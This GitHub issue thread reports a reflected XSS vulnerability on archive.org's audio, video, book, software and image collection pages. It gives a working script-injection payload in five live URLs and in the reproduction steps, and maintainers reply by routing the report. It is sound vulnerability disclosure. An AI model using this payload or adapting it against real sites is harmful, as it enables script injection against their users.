### ISSUE TITLE
XSS in all Audio/Videos/Books/Software/Images archives

### ISSUE THREAD

**Issue by MaorDayanOfficial** [internetarchive/openlibrary#3323]
### Evidence / Screenshot (if possible)
https://i.imgur.com/NxzSyk4.png

### Relevant url?
https://archive.org/details/movies?and[]=--><svG onLoad=alert('Maor_Security_Check')>&sin=on
https://archive.org/details/audio?and[]=--><svG onLoad=alert('Maor_Security_Check')>&sin=on
https://archive.org/details/books?and[]=--><svG onLoad=alert('Maor_Security_Check')>&sin=on
https://archive.org/details/software?and[]=--><svG onLoad=alert('Maor_Security_Check')>&sin=on
https://archive.org/details/images?and[]=--><svG onLoad=alert('Maor_Security_Check')>&sin=on

### Steps to Reproduce

1. Go to any type of archive - Audio/Videos/books/software/images
2. Add ?and[]=--><svG onLoad=alert('Maor_Security_Check')>&sin=on to the end of the URL

* Actual: Reflected XSS
* Expected: Reflected XSS

### Details

- **Logged in (Y/N)?**  No need for an account
- **Browser type/version?** Firefox Mozilla/Chrome
- **Operating system?** Windows/Mac OS X/Linux
- **Environment (prod/dev/local)?** prod

### Proposal & Constraints
 Encode XSS Characters in the pages

**Comment by guyjeangilles** [comment]
@mekarpeles This seems like an IA problem not an OLproblem. Should this issue be transferred?

**Comment by cdrini** [comment]
I pinged the right folks :+1:
